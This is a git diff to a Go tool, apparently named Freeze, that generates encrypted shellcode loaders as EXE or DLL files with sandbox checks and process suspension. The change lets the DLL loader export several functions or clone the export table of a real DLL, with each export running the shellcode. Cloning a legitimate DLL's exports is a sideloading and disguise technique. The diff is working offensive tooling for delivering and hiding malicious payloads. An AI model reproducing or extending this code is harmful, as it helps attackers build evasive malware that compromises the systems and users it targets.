diff --git a/Freeze.go b/Freeze.go index 9fd4a79..1f5d40a 100644 --- a/Freeze.go +++ b/Freeze.go @@ -39,7 +39,7 @@ func options() *FlagOptions { Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM?`) encrypt := flag.Bool("encrypt", false, "Encrypts the shellcode using AES 256 encryption") - export := flag.String("export", "", "For DLL Loaders Only - Specify a specific Export function for a loader to have.") + export := flag.String("export", "", "For DLL Loaders Only - Specify comma separated Export functions for a loader to have or supply a given DLL file for cloning its Export functions.") flag.Parse() return &FlagOptions{outFile: *outFile, inputFile: *inputFile, console: *console, Sha: *Sha, sandbox: *sandbox, process: *process, export: *export, encrypt: *encrypt} } @@ -134,11 +134,27 @@ func main() { } else { mode = ".exe" } + // Default DLL exports + var exports = []string{"DllRegisterServer", "DllGetClassObject", "DllUnregisterServer"} if opt.export != "" { - fmt.Println("[!] Added an additional Export function called: " + opt.export) + if strings.HasSuffix(opt.export, ".dll") { + var err error + exports, err = Utils.ExportsFromFile(opt.export) + if err != nil { + log.Fatal("Error: Could not get Export table from given DLL file") + } + fmt.Println("[!] Added additional Export functions from parsed DLL file: " + opt.export) + } else if strings.Contains(opt.export, ",") { + exports = strings.Split(strings.ReplaceAll(opt.export, " ", ""), ",") + fmt.Println("[!] Added additional Export functions from given list: " + opt.export) + } else { + exports = []string{opt.export} + fmt.Println("[!] Added an additional Export function called: " + opt.export) + } } + fmt.Println("[!] Selected Process to Suspend: " + opt.process) - name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, opt.export, opt.sandbox, opt.process, opt.encrypt) + name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, exports, opt.sandbox, opt.process, opt.encrypt) execute(opt, name, mode) } diff --git a/Loader/Loader.go b/Loader/Loader.go index 1ac4dac..cbc38a6 100644 --- a/Loader/Loader.go +++ b/Loader/Loader.go @@ -35,18 +35,21 @@ var ( buffer bytes.Buffer ) -func DLLfunction(export string) string { +func DLLfunctions(exports []string) string { var buffer bytes.Buffer DLL := &DLL{} DLL.Variables = make(map[string]string) - if export != "" { - DLL.Variables["ExportFunction"] = `//export ` + export + ` - func ` + export + `() { - Run() - }` - } else { - DLL.Variables["ExportFunction"] = `` + var dllStrings string + for _, export := range exports { + if export != "" { + dllStrings = dllStrings + `//export ` + export + ` + func ` + export + `() { + Run() + } + ` + } } + DLL.Variables["ExportFunction"] = dllStrings buffer.Reset() DLLExportTemplate, err := template.New("DLL").Parse(Struct.DLL_Export()) @@ -60,7 +63,7 @@ func DLLfunction(export string) string { } -func MainFunction(shellcodeencoded string, mode string, console bool, exportable string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string { +func MainFunction(shellcodeencoded string, mode string, console bool, exportables string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string { var buffer bytes.Buffer Main := &Main{} Main.Variables = make(map[string]string) @@ -224,7 +227,7 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable } if mode == "dll" { - Main.Variables["StartingFunction"] = exportable + Main.Variables["StartingFunction"] = exportables Main.Variables["ImportC"] = `import "C"` } else { Main.Variables["StartingFunction"] = `func main(){` @@ -364,10 +367,10 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable return buffer.String() } -func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, export string, sandbox bool, process string, encrypt bool) string { +func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, exports []string, sandbox bool, process string, encrypt bool) string { var exporttable string if mode == "dll" { - exporttable = DLLfunction(export) + exporttable = DLLfunctions(exports) } else { exporttable = "" } diff --git a/Struct/Struct.go b/Struct/Struct.go index a710f46..4ee4f84 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -2,28 +2,12 @@ package Struct func DLL_Export() string { return ` - //export DllRegisterServer - func DllRegisterServer() { - Run() - } - - //export DllGetClassObject - func DllGetClassObject() { - Run() - } - - //export DllUnregisterServer - func DllUnregisterServer() { - Run() - } - {{.Variables.ExportFunction}} func main(){ } - //export Run func Run(){ diff --git a/Utils/Utils.go b/Utils/Utils.go index 43f20f2..c0dc3ae 100644 --- a/Utils/Utils.go +++ b/Utils/Utils.go @@ -7,6 +7,7 @@ import ( "encoding/hex" "errors" "fmt" + "github.com/Binject/debug/pe" "io" "log" crand "math/rand" @@ -154,3 +155,20 @@ func CapLetter() string { } return string(b) } + +func ExportsFromFile(file string) (exports []string, err error) { + dllFile, err := pe.Open(file) + if err != nil { + return + } + exps, err := dllFile.Exports() + if err != nil { + return + } + for _, export := range exps { + if "Run" != export.Name { + exports = append(exports, export.Name) + } + } + return +} diff --git a/go.mod b/go.mod index 4f27109..7dfe8e7 100644 --- a/go.mod +++ b/go.mod @@ -1,3 +1,5 @@ module Freeze go 1.19 +require golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 // indirect +require github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee \ No newline at end of file diff --git a/go.sum b/go.sum index e69de29..9aa9e58 100644 --- a/go.sum +++ b/go.sum @@ -0,0 +1,4 @@ +golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 h1:nwzwVf0l2Y/lkov/+IYgMMbFyI+QypZDds9RxlSmsFQ= +golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak= +github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= \ No newline at end of file